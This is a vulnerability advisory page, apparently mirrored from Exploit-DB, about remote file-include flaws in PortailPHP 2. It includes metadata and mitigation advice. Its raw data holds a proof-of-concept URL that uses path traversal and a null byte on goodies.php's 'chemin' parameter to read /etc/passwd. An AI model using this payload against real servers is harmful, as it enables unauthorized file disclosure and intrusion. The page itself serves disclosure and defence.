header-logo
Suggest Exploit
vendor:
PortailPHP
by:
Unknown
7.5
CVSS
HIGH
Remote File Inclusion
Unknown
CWE
Product Name: PortailPHP
Affected Version From: PortailPHP 2
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:portailphp:portailphp:2
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

PortailPHP Multiple Remote File Include Vulnerabilities

The PortailPHP application is prone to multiple remote file-include vulnerabilities due to improper sanitization of user-supplied input. An attacker can exploit these vulnerabilities to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process, potentially leading to unauthorized access. The specific vulnerability occurs in PortailPHP 2, but other versions may also be affected.

Mitigation:

To mitigate these vulnerabilities, it is recommended to apply the latest security patches or updates provided by the vendor. Additionally, input validation and sanitization should be implemented to prevent malicious file inclusions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22381/info
 
PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
 
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
 
PortailPHP 2 is vulnerable to these issues; other versions may also be affected. 


http://www.example.com/mod_news/goodies.php?chemin=../../../../../../../../../../../../../etc/passwd%00

Navigation

Suggest Exploit

Services By CQR